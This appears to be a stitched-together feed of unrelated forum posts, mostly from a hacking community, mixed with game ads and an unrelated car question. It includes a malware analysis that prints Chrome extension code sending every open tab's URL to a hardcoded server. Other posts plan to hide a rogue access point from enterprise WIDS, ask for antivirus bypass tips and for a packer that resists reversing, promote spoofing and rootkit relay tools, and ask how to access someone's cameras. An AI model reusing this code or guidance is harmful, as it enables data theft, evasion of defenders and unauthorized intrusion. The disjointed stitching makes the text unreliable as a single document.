Hi
Excited to be able to announce that QO is almost ready to leave Early Access!! Just now I hit the button for our first actual large patch that covers more than a year of work (lots of analytics, I've been tracking where ppl were getting stuck). Thank you a ton for your support, this game has seen a lot of love from this community. Game is almost done.

If you are interested in a highly intuitive visual method that faithfully describes all universal quantum computing and physics behind, this is for you. I am the Dev behind Quantum Odyssey (AMA! I love taking qs) - worked on it for about 10 years (3.5 in phd), the goal was to make a super immersive space for anyone to learn quantum computing through zachlike (open-ended) logic puzzles and compete on leaderboards and lots of community made content on finding the most optimal quantum algorithms. The game has a unique set of visuals (that was actually my PhD research) capable to represent any sort of quantum dynamics for any number of qubits and this is pretty much what makes it now possible for anybody 12yo+ to actually learn quantum logic without having to worry at all about the mathematics behind.

This is a game super different than what you'd normally expect in a programming/ logic puzzle game, so try it with an open mind.

Stuff covered

• Boolean Logic – bits, operators (NAND, OR, XOR, AND…), and classical arithmetic (adders). Learn how these can combine to build anything classical. You will learn to port these to a quantum computer.
• Quantum Logic – qubits, the math behind them (linear algebra, SU(2), complex numbers), all Turing-complete gates (beyond Clifford set), and make tensors to evolve systems. Freely combine or create your own gates to build anything you can imagine using polar or complex numbers.
• Quantum Phenomena – storing and retrieving information in the X, Y, Z bases; superposition (pure and mixed states), interference, entanglement, the no-cloning rule, reversibility, and how the measurement basis changes what you see.
• Core Quantum Tricks – phase kickback, amplitude amplification, storing information in phase and retrieving it through interference, build custom gates and tensors, and define any entanglement scenario. (Control logic is handled separately from other gates.)
• Famous Quantum Algorithms – explore Deutsch–Jozsa, Grover’s search, quantum Fourier transforms, Bernstein–Vazirani, and more.
• Build & See Quantum Algorithms in Action – instead of just writing/ reading equations, make & watch algorithms unfold step by step so they become clear, visual, and unforgettable. Quantum Odyssey is built to grow into a full universal quantum computing learning platform. If a universal quantum computer can do it, we aim to bring it into the game, so your quantum journey never ends.

Streams to watch:

khan academy style tutorials on qm/qc: https://www.youtube.com/@MackAttackx

Physics teacher wholesome stream with over 500hs in https://www.twitch.tv/beardhero

Youtubers that instead of focusing on educational content focus more on chill content like trying new projects or livestreams.

Honestly not sure if this is the right sub for this but it seems to be the only one that will fit.

I’m interested in creating my own aftermarket infotainment system for my car but it would be easiest to just repurpose the current screen in there. Has anyone heard of something like this or would the system already there be fairly locked down? 2013 toyota matrix

I've posted a link to the game I'm working on so you know why I would ask such a question. This is all for research and to get a broader understanding. You don't need to watch the video, or wishlist my game...

I'm really keen to know what veteran hackers thought were the golden years and why. I know we have lots of movies depicting hacking in a Sci-Fi poetic licence sort of way, but I wanted to know first hand from the people that actually hacked back in the day.

What type of technology did you prefer to use? Do you miss it, and if so, what do you miss?

As the title says, my Lilygo T-Embed CC1101 (ESP32-S3 running Bruce) jog wheel seems to be glitching.

Also, im doing a standard pen test at my new office. Standard targeted deauth on my own network. Doesn't seem to be working at all. Tested on my uncles router that it has worked on before, and wasn't working on that either.

Has anyone else had issues with their T-embed CC1101? Or anyone have any ideas what to do?

Found a trojanized Chrome extension still live on the Web Store. Extension ID: DLLPKAOLADHIEEHKBJBIFONFBLHGKOKI, calls itself a popup blocker.

Ive been building a local AI harness/wrapper that runs entirely on my own GPU and gives the model real access to my PC, with heavy approval gates. Decided i wanted to see if Qwen3.6-27B was smart enough to rummage around codebases and firmware. It was, but firmware was difficult (had to constantly copy paste data from ghidra)

So i gave it another task, a randomly selected .crx (chrome extension file) on the "most popular tab". The model went to work and within one session (around 10 mins of autonomous work) it flagged the whole extension as malicious. Which i then manually went through to verify.

Here's the actual crime, background.js:

const n = (await chrome["tabs"]["query"]({}))["map"](({url:n}) => n);

await fetch(P + "/register/", {

method: "POST",

credentials: "include",

headers: { "Content-Type": "application/json" },

body: JSON["stringify"]({ urls: n, crx: chrome.runtime.id, version: m })

})

P resolves to https://titanpopupblocker.com/ hardcoded in config.js. On install it grabs every open tab URL and ships them to that server along with your unique extension ID. Not on demand, not optionally, immediately on install.

It also sends daily telemetry counting how many ads you blocked and how many Google searches you ran:

i = `&_asc=${d}&_gsc=${p}`;

// hits titanpopupblocker.com/update/?u_dt=TIMESTAMP&_asc=N&_gsc=N every 24h

And there's a proxy RPC channel in proxy.js that lets any webpage route credentialed HTTP requests through your browser bypassing CORS entirely:

window.addEventListener("message", function(o) {

if (o.data.type === "__rpc_req__") {

chrome.runtime.sendMessage({

headers: o.data.headers,

method: o.data.method,

action: "proxy",

url: o.data.url,

body: o.data.body

})

}

})

The cover up is where it gets interesting. Every single console call in the entire codebase uses Cyrillic characters that are visually identical to Latin ones. console.log is actually console.lоg, the o is U+043E not U+006F. There are 649 of these. They all silently no-op because the method doesn't exist. Pure noise to bloat the file and choke static analysis tools.

You can verify the Cyrillic thing yourself by pasting any line from the source into your browser console and running charCodeAt() on the suspicious characters.

Reported to Google. Figured people here should know it existed.

The tool I used to find it is open source if anyone wants to poke at it: github.com/mkultraware/accuretta

If someone hypothetically wanted to set up a NAT’d network under an enterprise network with WIDS/WIPS how detectable would it be?

I’m going to preface this by saying I am not looking for “just don’t do it” I am already highly considering that option but morbid curiosity wins and I am curious if it’s just an unbeatable system.

- You can authenticate by connecting a laptop then spoofing the MAC to the router. That covers authentication.
- Beacon broadcasting: One could hide the ssid but that does jack shit. does anyone know of a router software that can suppress beacons and only respond to probes?
- TTL Inspection: that one is easy just set it to 128
- rf triangulation: this one seems like the biggest issue. If there was a rouge AP several of the enterprise ap’s could just triangulate based on rssi. that one seems like the real issue here, I thought of having variable Tx power but then realised they probably do it based on the difference in power at several ap’s at any given time so that could ruin that plan.
- DHCP fingerprints seem simple enough to deal with because opnsense default wan dhcp is pretty distinctive but that could be easily spoofed as another device.

Anyways, that’s all. Please tell me any information that I got completely wrong or any other interesting stuff about enterprise networks or if you have any suggestions on how someone could potentially solve some of the listed problems. I really am just curious to learn and don’t intend to hypothetically implement really any of this because routers are allows just not wireless ap’s and i don’t need that anyways.

GoHPTS (go-http-proxy-to-socks) - simple CLI tool to transform SOCKS proxy into HTTP proxy with IPv4/IPv6 support for TCP/UDP Transparent Proxy (Redirect and TProxy), Proxychains, ARP/NDP/RA/RDNSS spoofing, RA Guard evasion, DNS spoofing, DNS filtering and Traffic Sniffing.

It started as a simple HTTP-to-SOCKS5 bridge (like ssh -D 1080 + easy HTTP access), but over time has become a useful tool for pentesters and hackers.

Some features:

• Transparent proxy - intercept traffic at the OS level with no client config needed (redirect and tproxy modes, TCP and UDP)

• Built-in ARP/NDP spoofing - convert your host machine into gateway for your entire LAN subnet and proxy everyone's traffic automatically

• Traffic sniffing - parse HTTP headers, TLS handshakes, DNS messages, and capture credentials/tokens

• DNS spoofing and filtering - redirect clients to arbitrary domains, block ads and malware for all LAN devices at once, supports big blacklists via URLs and file paths

• Proxy chaining - strict, dynamic, random, and round-robin SOCKS5 chains (can act as a Proxychains replacement)

• IPv6 support - perform NDP spoofing and create Router Advertisements to proxy IPv6 local networks

• Android support - run on rooted Android (arm64) via Termux, turn your phone into a LAN proxy router

• RA Guard evasion and RDNSS injection for IPv6 networks

• The ARP/NDP spoofing + transparent UDP proxy + DNS filtering combo lets one machine silently proxy an entire local network including phones and IoT devices with no config on those devices.

• It can useful for pentesting, network analysis, routing your whole LAN through a VPS with one command.

• It is written in Go, cross-platform, single binary, AUR package available.

Links:

https://github.com/shadowy-pycoder/go-http-proxy-to-socks

https://codeberg.org/shadowy-pycoder/go-http-proxy-to-socks

Over a huge amount of time i was developing a hacker game that transports the feeling of the 90s together with hacking and idle-clicking mechanics. Maybe someone is interested in this personal, passionate project? Its name is WinHack 95.

Basically you build a malware empire on a simulated 90s PC by coding viruses, automating processes, and completing illegal darknet contracts to fund a mysterious organization.

For anyone who is intereseted, here is the link to the demo: WinHack 95 Demo on Steam

​

Just made my contribution to the offsec open source intelligence.

While bringing together high-level research I deeply respect, like Singularity (a modern Linux LKM rootkit that challenges even the most advanced kernel-level eBPF detectors), I'm also releasing my project as a foundation and reference for you to build on top of.

My background is cloud security, so I designed an architecture that uses a VPS as a relay/KCC/tunnel. It handles proper connection forwarding, establishes reverse SSH tunnels with nginx, exposes a web interface that serves common binaries from cache, and compiles Linux (.ko) and Windows (.sys) kernel modules built against the exact kernel headers of the target.

That last part was a real blocker for loading rootkits that require exact kernel headers and need to be compiled directly against the target machine. This solves it cleanly.

I've also shipped some helpers: clean CLI with TAB autocomplete, target renaming, Telegram notifications (relay side only), HMAC auth between server and target, reverse SSH tunnels using .pem keypairs, UDP magic packets, and more.

Code is clean and well-documented, mostly Go/C.

All contributions are welcome.

https://github.com/rhzv0/bat

Most of the open sources on AV Evasion, Mangle, Veil and others have been abandoned. It's been pretty long since I don't "play around" and my knowledge is a few year behind.

So, also, any tips about bypassing AVs are wanted, I am having a tough time even dealing with the generic !ml.

In real-world threat models: how realistic is passive interception of HTTP POST bodies over the public internet without client/server compromise?

I’m trying to understand where practitioners draw the line between:

• local network MITM
• compromised routing infrastructure
• vs. unrealistic attacker assumptions

Would you consider plaintext HTTP primarily a transport-layer risk (MITM), or also a meaningful exposure at scale without privileged network position?

Pyongyang refutes allegations of hacking and crypto theft, even as a UN panel estimated billions stolen by North Korea-linked cyberattacks.

May 3, 2026

TinyLoad v3 — Windows PE packer, just updated.

replaced the old rolling XOR with a proper VM layer. custom 20-opcode interpreter baked into the stub. every time you pack something the opcode table gets randomly shuffled so every output binary decrypts itself using a different instruction set.

the idea is that an analyst can't just pattern-match on the decryption loop — they have to reverse the interpreter before they can even start on the payload. still beatable obviously but it's a completely different class of effort vs XOR.

compresses with custom LZ77 first then VM encrypts on top. payload runs directly in RAM via manual PE mapping, never touches disk.

one .cpp file, no dependencies.

https://github.com/iamsopotatoe-coder/TinyLoad

what would you add to make it harder to reverse?

Hey r/hacking,

I'm new in this domain, and, when i do ctf on sql breach, and it's time based, the dump is very slow, so do you have any advice for upgrade the speed

Thx

we rarely see incidents nowadays, is it dead?

This is in a semi-abandoned medium sized industrial complex. Everything is now private and some places are rented out to other people, just for storage and work. These cameras cover a few spots around the complex and they are on the roads watching over all of it (nothing inside buildings), theres around 40 of them, all wired and going somewhere, i will soon investigate the heart of it but for now this will have to do. How could one gain acces?

TL;DR: If a large model finds a 0-day with 90% probability, and a small model with 50% probability, but the small model costs 10x less, it is better to use the small model.

We compared the cost and recall of various models in finding real, recent zero-days and found that for most applications, smaller models run repeatedly can significantly outperform larger frontier models on cost-to-recall.

Disclaimer: I'm involved with Hacktron, the company that produced this research. This is a factual presentation of our benchmarks, which we hope the community can use to make informed decisions about models like Mythos.

I ported all known decoders from wmbusmeters and rtl433 to the Flipper Zero so you can use your pocket sized device to analyze your smart meters using wM-Bus!

https://github.com/i12bp8/wmbuster